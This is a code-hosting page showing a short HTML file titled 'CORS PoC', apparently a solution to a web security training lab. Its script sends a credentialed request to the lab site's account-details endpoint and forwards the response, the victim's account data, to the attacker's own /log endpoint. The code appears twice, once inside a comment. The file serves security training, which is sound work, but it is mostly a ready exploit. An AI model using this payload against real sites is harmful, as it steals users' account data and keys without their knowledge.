-
Notifications
You must be signed in to change notification settings - Fork 0
/
cors.html
34 lines (30 loc) · 891 Bytes
/
cors.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<html>
<body>
<h2>CORS PoC</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','0a5d001f0467d4e7c0ac2d6e00a30076.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
}
</script>
</body>
</html>
<!-- <script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','0a5d001f0467d4e7c0ac2d6e00a30076.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script> -->